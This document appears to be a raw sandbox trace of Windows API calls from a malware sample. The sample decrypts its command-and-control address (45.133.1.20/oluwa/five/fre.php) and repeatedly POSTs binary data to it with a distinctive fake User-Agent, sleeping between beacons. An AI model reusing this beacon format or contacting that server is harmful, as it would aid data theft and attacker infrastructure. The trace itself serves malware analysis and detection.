[0250.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0250.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.690] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0250.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.701] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0250.722] GetProcessHeap () returned 0x6a0000 [0250.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0250.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.724] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0250.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.725] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0250.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.727] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.727] GetProcessHeap () returned 0x6a0000 [0250.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0250.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.729] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0250.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.736] CryptDestroyKey (hKey=0x6ad020) returned 1 [0250.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.737] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0250.737] GetProcessHeap () returned 0x6a0000 [0250.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0250.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.738] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0250.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.740] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0250.740] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.741] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0250.742] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.742] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0250.742] GetProcessHeap () returned 0x6a0000 [0250.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0250.742] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0250.742] GetProcessHeap () returned 0x6a0000 [0250.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0250.743] GetProcessHeap () returned 0x6a0000 [0250.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0250.743] GetProcessHeap () returned 0x6a0000 [0250.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0250.744] GetProcessHeap () returned 0x6a0000 [0250.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0250.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.745] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0250.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.751] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0250.760] GetProcessHeap () returned 0x6a0000 [0250.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0250.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.761] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0250.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.763] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0250.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.764] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.764] GetProcessHeap () returned 0x6a0000 [0250.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0250.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.766] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0250.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.767] CryptDestroyKey (hKey=0x6ad020) returned 1 [0250.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0250.768] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0250.768] GetProcessHeap () returned 0x6a0000 [0250.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0250.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.770] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0250.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.771] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0250.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.815] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0250.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.818] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0250.818] GetProcessHeap () returned 0x6a0000 [0250.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0250.819] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0250.819] GetProcessHeap () returned 0x6a0000 [0250.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0250.819] socket (af=2, type=1, protocol=6) returned 0x840 [0250.819] connect (s=0x840, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0250.877] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0250.893] GetProcessHeap () returned 0x6a0000 [0250.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0250.899] GetProcessHeap () returned 0x6a0000 [0250.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0250.900] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0250.901] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0250.901] GetProcessHeap () returned 0x6a0000 [0250.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c48b8 [0250.901] GetProcessHeap () returned 0x6a0000 [0250.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0250.902] GetProcessHeap () returned 0x6a0000 [0250.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0250.902] GetProcessHeap () returned 0x6a0000 [0250.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0250.903] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0250.904] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0250.904] GetProcessHeap () returned 0x6a0000 [0250.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0250.904] GetProcessHeap () returned 0x6a0000 [0250.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0250.904] send (s=0x840, buf=0x6bd460*, len=242, flags=0) returned 242 [0250.905] send (s=0x840, buf=0x6bb998*, len=159, flags=0) returned 159 [0250.905] GetProcessHeap () returned 0x6a0000 [0250.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0250.905] recv (in: s=0x840, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0250.982] GetProcessHeap () returned 0x6a0000 [0250.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0250.983] GetProcessHeap () returned 0x6a0000 [0250.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0250.984] GetProcessHeap () returned 0x6a0000 [0250.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c48b8 | out: hHeap=0x6a0000) returned 1 [0250.984] GetProcessHeap () returned 0x6a0000 [0250.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0250.985] closesocket (s=0x840) returned 0 [0250.986] GetProcessHeap () returned 0x6a0000 [0250.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0250.986] GetProcessHeap () returned 0x6a0000 [0250.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0250.986] GetProcessHeap () returned 0x6a0000 [0250.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0250.987] GetProcessHeap () returned 0x6a0000 [0250.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0251.002] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1570) returned 0x840 [0251.004] Sleep (dwMilliseconds=0xea60) [0251.006] GetProcessHeap () returned 0x6a0000 [0251.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0251.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.007] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.018] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0251.030] GetProcessHeap () returned 0x6a0000 [0251.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c77e8 [0251.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.031] CryptImportKey (in: hProv=0x6bf058, pbData=0x6c77e8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0251.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.032] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.039] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.039] GetProcessHeap () returned 0x6a0000 [0251.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c77e8 | out: hHeap=0x6a0000) returned 1 [0251.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.041] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0251.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.042] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0251.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.043] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0251.043] GetProcessHeap () returned 0x6a0000 [0251.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0251.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.044] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0251.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.045] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0251.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.046] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0251.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.047] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0251.047] GetProcessHeap () returned 0x6a0000 [0251.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0251.047] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0251.048] GetProcessHeap () returned 0x6a0000 [0251.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0251.049] GetProcessHeap () returned 0x6a0000 [0251.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0251.049] GetProcessHeap () returned 0x6a0000 [0251.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0251.050] GetProcessHeap () returned 0x6a0000 [0251.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0251.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.051] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.095] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0251.111] GetProcessHeap () returned 0x6a0000 [0251.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0251.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.115] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0251.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.116] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.117] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.117] GetProcessHeap () returned 0x6a0000 [0251.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0251.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.118] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0251.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.119] CryptDestroyKey (hKey=0x6ad020) returned 1 [0251.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.121] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0251.121] GetProcessHeap () returned 0x6a0000 [0251.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0251.122] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.122] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0251.123] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.127] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0251.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.128] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0251.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.129] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0251.129] GetProcessHeap () returned 0x6a0000 [0251.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0251.129] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0251.129] GetProcessHeap () returned 0x6a0000 [0251.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0251.129] socket (af=2, type=1, protocol=6) returned 0x844 [0251.130] connect (s=0x844, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0251.218] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0251.218] GetProcessHeap () returned 0x6a0000 [0251.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0251.218] GetProcessHeap () returned 0x6a0000 [0251.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0251.219] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0251.220] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0251.220] GetProcessHeap () returned 0x6a0000 [0251.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4c78 [0251.220] GetProcessHeap () returned 0x6a0000 [0251.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0251.221] GetProcessHeap () returned 0x6a0000 [0251.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0251.221] GetProcessHeap () returned 0x6a0000 [0251.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0251.222] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0251.224] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0251.224] GetProcessHeap () returned 0x6a0000 [0251.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0251.224] GetProcessHeap () returned 0x6a0000 [0251.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0251.226] send (s=0x844, buf=0x6bd460*, len=242, flags=0) returned 242 [0251.226] send (s=0x844, buf=0x6bb998*, len=159, flags=0) returned 159 [0251.226] GetProcessHeap () returned 0x6a0000 [0251.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0251.227] recv (in: s=0x844, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0251.305] GetProcessHeap () returned 0x6a0000 [0251.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0251.306] GetProcessHeap () returned 0x6a0000 [0251.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0251.307] GetProcessHeap () returned 0x6a0000 [0251.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4c78 | out: hHeap=0x6a0000) returned 1 [0251.307] GetProcessHeap () returned 0x6a0000 [0251.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0251.307] closesocket (s=0x844) returned 0 [0251.308] GetProcessHeap () returned 0x6a0000 [0251.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0251.308] GetProcessHeap () returned 0x6a0000 [0251.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0251.309] GetProcessHeap () returned 0x6a0000 [0251.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0251.309] GetProcessHeap () returned 0x6a0000 [0251.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0251.310] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1574) returned 0x844 [0251.313] Sleep (dwMilliseconds=0xea60) [0251.316] GetProcessHeap () returned 0x6a0000 [0251.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0251.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.317] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.327] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0251.336] GetProcessHeap () returned 0x6a0000 [0251.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0251.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.337] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 